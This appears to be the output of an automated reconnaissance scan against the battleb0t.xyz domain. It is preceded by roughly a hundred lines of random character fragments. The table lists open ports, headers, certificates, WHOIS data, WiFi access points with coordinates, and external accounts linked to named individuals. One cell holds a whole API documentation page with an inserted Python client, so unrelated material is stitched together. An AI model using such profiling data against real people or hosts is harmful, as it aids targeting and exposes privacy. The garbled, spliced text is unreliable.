8RktA
-B09:
FRp.PD
A7e k
`kfZb
A8tSNJ
4j@Q4
H8@I"
`Y@A4
!Ot-T
Hh4@OFx4
@2RIA
.MoFZ
S>J9`
1tjP@
A!<Il
3rInvMB
6flJ$
bPD1T_aAc
_`0Zp
1 QVQ
`MXp<K
M39CvX
JtP5A
wtIXB
-3nB-
rtiC
1@f!X
I.ABD
'`jh
tj!HC
Fyv3/
-ApI
99pfaHF
/jMql
5Oy@8U2Q9
Mpi.`
y5_@.
sTiQJ
4Qfqml
wc7nAS
3fti0
w2MrS
?O`OU
E7-B/
PQj@fQod
'ASM6
'aC_@
>JkA8
ks< j
nP?2P
5z'0i
ALQxL
`-DJE
-HqnK
LSq a
S`j68
sV\0i7
IIA4K/
a/L K
R3E5H
$ii/aD<V
@9qEkj
fdcK-
k\p/
e<@E7
TPkZAY
o@i>K
IT 'v
Ip@>u
9x:'F
A/e7h
vj/a1
BnMLh
rJMD\
$5eiS r
@k<rPfcnM
nTqD
8JMKu
-h eo
6OCil-
NdZs>J
H yZ4
eKvkJ
MDA8n
A8mJ'
jTO!D
wPKqV | https://pics.battleb0t.xyz/images/fredo.PNG |
| 2023-05-12 03:01:01 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.106): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:46:54 | Affiliate - Domain Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cloudflare.com | leanna.ns.cloudflare.com |
| 2023-05-12 02:50:26 | Physical Address | No | GLEIF | 0 | 0 | 3 | 0 | None | C/O REGISTERED AGENT SOLUTIONS, INC., 838 Walker Road Suite 21-2, DOVER, US-DE, US, 19904 | Cloudflare\, Inc. |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | WHLee (Net ID: 00:01:21:30:54:A3) | 41.8781, -87.6298 |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 104.21.6.166 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | WHLee (Net ID: 00:01:21:30:54:A4) | 41.8781, -87.6298 |
| 2023-05-12 03:00:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.51): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:44 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 3 | 0 | None | Google Analytics | vscode.battleb0t.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | spacebunny (Net ID: 00:11:50:23:B8:1D) | 50.8897, 6.0563 |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.91): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:09:05 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.110 | 87.248.157.102 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | vgf2002noxx (Net ID: 00:02:2D:74:6E:AA) | 50.1188, 8.6843 |
| 2023-05-12 03:23:19 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.5:80 | 188.114.96.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | lobste.rs (Category: tech)
https://lobste.rs/u/login | login |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 104.21.6.166 |
| 2023-05-12 03:18:53 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Rotated 180 @ 18} | https://funny.battleb0t.xyz/images/reveloder.jpg |
| 2023-05-12 02:54:18 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | nwapi.battleb0t.xyz |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | pureftpd | 87.248.157.102 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Project management software | battleb0t.github.io |
| 2023-05-12 03:13:03 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0000-bigtree.github.io]
https://www.openphish.com/feed.txt | 0000-bigtree.github.io |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | W4B3P]]00S210)>&01/54&6/%&_&'_Pa (Net ID: 00:06:66:23:00:BA) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | ifunny (Category: misc)
https://ifunny.co/user/login | login |
| 2023-05-12 02:44:17 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.111.153 |
| 2023-05-12 02:53:32 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 185.199.111.153 |
| 2023-05-12 03:03:37 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00why00.github.io |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0Oz6%2FLYR6mlw4qLR9TqycfDZLMo35NVUiZYmytvsw3hnWwlYi3vXylGK8mcPxqptF5Q12B2z9i8IcSssMtY%2F8jZKTAZstXlLXIh5z%2FfUynzRd9ziD3olhhhTaQ1vvaqk6%2BxJd7oSs5Bg"}],"group":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"909ebccb4059d7a6690e6424fe1cd04d\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=0Oz6%2FLYR6mlw4qLR9TqycfDZLMo35NVUiZYmytvsw3hnWwlYi3vXylGK8mcPxqptF5Q12B2z9i8IcSssMtY%2F8jZKTAZstXlLXIh5z%2FfUynzRd9ziD3olhhhTaQ1vvaqk6%2BxJd7oSs5Bg\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60498977c3f0-EWR"} |
| 2023-05-12 03:00:50 | Co-Hosted Site | No | HackerTarget | 1 | 0 | 2 | 0 | None | 000.dontkillmyapp.com | 185.199.111.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:EE:55:AC) | 41.8781, -87.6298 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
x-powered-by: PHP/7.4.33
content-type: text/html; charset=UTF-8
link: <https://acilacikveteriner.com/wp-json/>; rel="https://api.w.org/"
transfer-encoding: chunked
content-encoding: gzip
vary: Accept-Encoding
date: <REDACTED>
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
| 87.248.157.102 |
| 2023-05-12 02:47:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 185.199.111.153:80 | 185.199.111.153 |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5ccedd4dfe2bc6-FRA"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.6.166 |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.247): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNetCBD2 (Net ID: 00:01:36:59:CB:D0) | 37.780462,-122.390564 |
| 2023-05-12 03:21:08 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Picsart (Category: art)
https://picsart.com/u/dawidsulej | dawidsulej |
| 2023-05-12 02:56:27 | Hash | No | Hash Extractor | 0 | 0 | 3 | 0 | None | [MD5] 02ca825e4901e74c2c2d6f8e59341325 | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="iron" href="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" sizes="512x512" type="image/png" />
<meta property="og:title" content="SkyHelper API - Documentation" />
<meta property="og:image" content="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" />
<meta property="oh.theme-color" content="#3585d0" />
<meta property="og:description" content="A hypixel skyblock API wrapper containing most features that the SkyHelper bot has to offer." />
<title>SkyHelper API - Documentation</title>
<link rel="stylesheet" href="https://stackedit.io/style.css" />
</head>
<body class="stackedit">
<div class="stackedit__html">
<h1 id="skyhelper-api">SkyHelper API</h1>
<h1 id="authentication">Authentication</h1>
<p>
The SkyHelper API uses their own API keys to authenticate requests. You can either host this API on your own server and define keys on there or subscribe to the SkyHelper
<a href="https://www.patreon.com/skyhelper">Patreon</a> (Silver or Gold Supporter) to get an API key from me.<br />
You can either use the key query parameter by adding a
<code>?key=token</code> to the end of API requests or using an authorization header by adding a <code>Authorization</code> header to your API requests, where the value of the header is your API
token.
</p>
<h1 id="responses">Responses</h1>
<p>
All endpoints in the API return all their responses in JSON, all requests will return a <code>status</code> key which should match the response status code that was returned and a
<code>data</code> key for successful responses. A <code>reason</code> key will be returned for failed requests.
</p>
<table>
<thead>
<tr>
<th>Status Code</th>
<th>Reason</th>
</tr>
</thead>
<tbody>
<tr>
<td>200</td>
<td>Successful request</td>
</tr>
<tr>
<td>400</td>
<td>
The request is missing an authentication method (valid
<code>key</code> query parameter or an <code>Authentication</code> header)
</td>
</tr>
<tr>
<td>403</td>
<td>The provided token does not exist</td>
</tr>
<tr>
<td>404</td>
<td>There is no player with the given UUID or name or the player has no SkyBlock profiles</td>
</tr>
<tr>
<td>429</td>
<td>
The Hypixel API rate-limit was reached (The API will return
<code>RateLimit-Remaining</code> and <code>RateLimit-Reset</code> headers)
</td>
</tr>
<tr>
<td>500</td>
<td>
There was an error in the SkyHelper API or the Hypixel API returned an unknown error code. Please report these errors back on
<a href="https://github.com/Altpapier/SkyHelperAPI/issues">GitHub</a>
</td>
</tr>
<tr>
<td>502</td>
<td>Hypixel's API is experiencing technical issues or is unavailable</td>
</tr>
<tr>
<td>503</td>
<td>Hypixel's API is in maintenance mode</td>
</tr>
<tr>
<td>504</td>
<td>Hypixel's API returned a <code>Gateway Time-out</code> error</td>
</tr>
</tbody>
</table>
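<p>Added example (not code from the SkyHelper project): a small Python client layer for the authentication and response contract described above. The base URL is a placeholder; the header name, the <code>status</code>/<code>data</code>/<code>reason</code> keys and the <code>RateLimit-*</code> headers follow this page. The Authorization header is preferred over <code>?key=</code> because query strings end up in access logs, proxies and browser history.</p>

```python
"""Client helpers for the SkyHelper API contract documented above.

Added example, not code from the SkyHelper project. Assumptions: the
placeholder BASE_URL below, and the documented response shape (every JSON
body has a ``status`` key equal to the HTTP status code, ``data`` on
success, ``reason`` on failure, RateLimit-* headers on 429).
"""
import json
import urllib.request
from dataclasses import dataclass
from typing import Any, Optional

BASE_URL = "https://example.invalid/skyhelper"  # placeholder, not the real host


def build_request(path: str, api_key: str,
                  body: Optional[dict] = None) -> urllib.request.Request:
    """Build a request authenticated with the Authorization header.

    The page also allows ``?key=token``; the header form keeps the secret
    out of URLs, which get logged by servers, proxies and CDNs.
    """
    headers = {"Authorization": api_key, "Accept": "application/json"}
    data = None
    if body is not None:
        data = json.dumps(body).encode("utf-8")
        headers["Content-Type"] = "application/json"
    return urllib.request.Request(BASE_URL + path, data=data, headers=headers,
                                  method="POST" if body is not None else "GET")


@dataclass
class ApiResult:
    ok: bool
    status: int
    data: Any = None
    reason: Optional[str] = None
    retry_after: Optional[int] = None  # seconds until the rate limit resets (429 only)


class ContractError(ValueError):
    """Raised when a response does not follow the documented shape."""


def parse_response(http_status: int, headers: dict, body: bytes) -> ApiResult:
    """Validate a response against the documented contract and unpack it."""
    try:
        payload = json.loads(body)
    except ValueError as exc:
        raise ContractError(f"non-JSON body with HTTP {http_status}") from exc
    if not isinstance(payload, dict) or "status" not in payload:
        raise ContractError("response lacks the required 'status' key")
    if payload["status"] != http_status:
        # The docs require these to match; a mismatch usually means an
        # intermediary (CDN, proxy) answered instead of the API itself.
        raise ContractError(f"body status {payload['status']} != HTTP {http_status}")
    if http_status == 200:
        if "data" not in payload:
            raise ContractError("successful response without 'data'")
        return ApiResult(ok=True, status=200, data=payload["data"])
    # Failure path: 'reason' is documented; RateLimit-Reset only appears on 429.
    lowered = {k.lower(): v for k, v in headers.items()}
    retry = None
    if http_status == 429 and "ratelimit-reset" in lowered:
        retry = int(lowered["ratelimit-reset"])
    return ApiResult(ok=False, status=http_status,
                     reason=payload.get("reason"), retry_after=retry)
```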
<h1 id="endpoints">Endpoints</h1>
<h3 id="get-v2networth"><code>POST</code> /v2/networth</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>profileData</td>
<td>Object</td>
<td>The profile player data from the Hypixel API (profile.members[uuid])</td>
</tr>
<tr>
<td>bankBalance</td>
<td>Number</td>
<td>The player's bank balance from the Hypixel API (profile.banking?.balance)</td>
</tr>
<tr>
<td>onlyNetworth</td>
<td>Boolean</td>
<td>(default: false) If true, only the networth will be returned</td>
</tr>
</tbody>
</table>
<h3 id="post-v2networthitem"><code>POST</code> /v2/networth/item</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>itemData</td>
<td>Object</td>
<td>The parsed item data of an item from the profiles endpoint</td>
</tr>
</tbody>
</table>
<h3 id="get-v2profilesuser"><code>GET</code> /v2/profiles/:user</h3>
<h3 id="get-v2profileuserprofile"><code>GET</code> /v2/profile/:user/:profile</h3>
<h3 id="get-v1profilesuser"><code>GET</code> /v1/profiles/:user</h3>
<h3 id="get-v1profileuserprofile"><code>GET</code> /v1/profile/:user/:profile</h3>
<h3 id="get-v1profilesuseritems"><code>GET</code> /v1/items/:user</h3>
<h3 id="get-v1profileuserprofileitems"><code>GET</code> /v1/items/:user/:profile</h3>
<h3 id="get-v1fetchur"><code>GET</code> /v1/fetchur</h3>
<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>user</td>
<td>The UUID or the name of a user</td>
</tr>
<tr>
<td>profile</td>
<td>The user's profile id or name</td>
</tr>
</tbody>
</table>
<h1 id="networthcalculationtypes">Networth Calculation Types</h1>
<p>Types used to describe an item's networth calculation.</p>
<table>
<thead>
<tr>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>essence</td>
</tr>
<tr>
<td>prestige</td>
</tr>
<tr>
<td>shens_auction</td>
</tr>
<tr>
<td>winning_bid</td>
</tr>
<tr>
<td>enchant</td>
</tr>
<tr>
<td>silex</td>
</tr>
<tr>
<td>wood_singularity</td>
</tr>
<tr>
<td>tuned_transmission</td>
</tr>
<tr>
<td>thunder_charge</td>
</tr>
<tr>
<td>rune</td>
</tr>
<tr>
<td>fuming_potato_book</td>
</tr>
<tr>
<td>hot_potato_book</td>
</tr>
<tr>
<td>dye</td>
</tr>
<tr>
<td>the_art_of_war</td>
</tr>
<tr>
<td>the_art_of_peace</td>
</tr>
<tr>
<td>farming_for_dummies</td>
</tr>
<tr>
<td>recombobulator_3000</td>
</tr>
<tr>
<td>gemstone</td>
</tr>
<tr>
<td>reforge</td>
</tr>
<tr>
<td>master_star</td>
</tr>
<tr>
<td>necron_scroll</td>
</tr>
<tr>
<td>gemstone_chamber</td>
</tr>
<tr>
<td>drill_part</td>
</tr>
<tr>
<td>etherwarp_conduit</td>
</tr>
<tr>
<td>pet_item</td>
</tr>
|
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:F6:2B:B0) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:53:35 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 22DC:47A8:9574C0:E80210:645D792E
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-chi-klot8100109-CHI
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683847470.229374,VS0,VE28
Vary: Accept-Encoding
X-Fastly-Request-ID: ae50aba31a182a84ec5561a841cace6a8bdb972f
| 185.199.110.153 |
| 2023-05-12 02:55:15 | Physical Location | No | Censys | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, 60306, Germany, Europe | 165.232.113.85 |
| 2023-05-12 02:54:13 | HTTP Headers | No | Web Spider | 2 | 0 | 3 | 0 | None | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:13 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-19c8\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:13 GMT", "cf-ray": "7c5f6036af1541db-EWR", "content-type": "text/css", "x-frame-options": "DENY"} | https://ayhu.xyz/cdn-cgi/styles/challenges.css |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Interwrx2 (Net ID: 00:02:2D:A8:80:99) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:23:41 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | PinkBike (Category: hobby)
https://www.pinkbike.com/u/baptiste.vauthey/ | baptiste.vauthey |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 50d173 (Net ID: 00:02:2D:50:D1:73) | 37.7642, -122.3993 |
| 2023-05-12 03:09:52 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.95 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 4 | 0 | None | cloudflare | {"transfer-encoding": "chunked", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "server": "cloudflare", "connection": "keep-alive", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:21 GMT", "x-frame-options": "SAMEORIGIN", "referrer-policy": "same-origin", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f606679610ce9-EWR"} |
| 2023-05-12 03:34:24 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 45.131.109.47 | 45.131.109.53 |
| 2023-05-12 03:16:25 | Username | No | Account Finder | 1 | 0 | 1 | 0 | None | dawid.sulej | Dawid Sulej |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-experiments.github.io]
https://www.openphish.com/feed.txt | 0-experiments.github.io |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ^D^M^L^W^]^C^A^U^M^Y^E^L^_^R^G (Net ID: 00:05:5D:D9:90:56) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:54:23 | Raw Data from RIRs | No | Censys | 0 | 0 | 4 | 0 | None | [raw Censys DNS record dump omitted] | 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:33:53 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | [binary string dump omitted] | https://funny.battleb0t.xyz/images/random_2.jpeg |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F4:A4:02) | 41.8781, -87.6298 |
| 2023-05-12 02:54:57 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 13335 | 2a06:98c1:3120::1 |
| 2023-05-12 02:55:21 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:81:34:2e:fd:61:48:b5:6f:11:ca:36:0b:dc:62:9a:cf:52
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:02 2022 GMT
Not After : Feb 15 09:44:01 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
A7:55:24:63:5E:86:20:7B:DE:F3:EF:D8:48:33:0B:C7:5C:3F:22:72
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ^U^E^H^O^[^U^H^_^^^G^K^Z^X^E^^ (Net ID: 00:02:2D:7F:0D:E1) | 34.0544, -118.244 |
| 2023-05-12 02:44:28 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | [certificate transparency record dump omitted] |
| 2023-05-12 02:54:15 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://hypixel-api.senither.com | https://nwapi2.battleb0t.xyz/ |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:8880 | 104.21.6.166 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-4262 (Net ID: 00:1D:D1:0B:42:60) | 32.8608, -79.9746 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 2WIRE115 (Net ID: 00:00:94:D4:4C:5A) | 41.8781, -87.6298 |
| 2023-05-12 03:10:08 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 3 | 0 | None | VOIPBL Publicly Accessible PBX List [185.199.110.0/24]
http://www.voipbl.org/update | 185.199.110.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | LocationFree.00014AEC392A (Net ID: 00:01:4A:EC:39:2A) | 37.7642, -122.3993 |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.163): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:20 | Physical Location | No | Censys | 1 | 0 | 4 | 0 | None | Seattle, Washington, 98108, United States, North America | 2600:1f18:2489:8200::c8 |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:443 | 172.67.168.252 |
| 2023-05-12 03:31:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | domain.operations@web.com | Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:40:26Z
Creation Date: 2018-06-27T20:51:35Z
Registry Expiry Date: 2024-06-27T20:51:35Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8003337680
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:41:04Z
Creation Date: 2018-06-27T20:51:35Z
Registrar Registration Expiration Date: 2024-06-27T04:00:00Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: PERFECT PRIVACY, LLC
Registrant Organization:
Registrant Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Registrant City: Jacksonville
Registrant State/Province: FL
Registrant Postal Code: 32256
Registrant Country: US
Registrant Phone: +1.5707088622
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Admin ID:
Admin Name: PERFECT PRIVACY, LLC
Admin Organization:
Admin Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Admin City: Jacksonville
Admin State/Province: FL
Admin Postal Code: 32256
Admin Country: US
Admin Phone: +1.5707088622
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Tech ID:
Tech Name: PERFECT PRIVACY, LLC
Tech Organization:
Tech Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Tech City: Jacksonville
Tech State/Province: FL
Tech Postal Code: 32256
Tech Country: US
Tech Phone: +1.5707088622
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: c26pf75p2tc@networksolutionsprivateregistration.com
Name Server: KIM.NS.CLOUDFLARE.COM
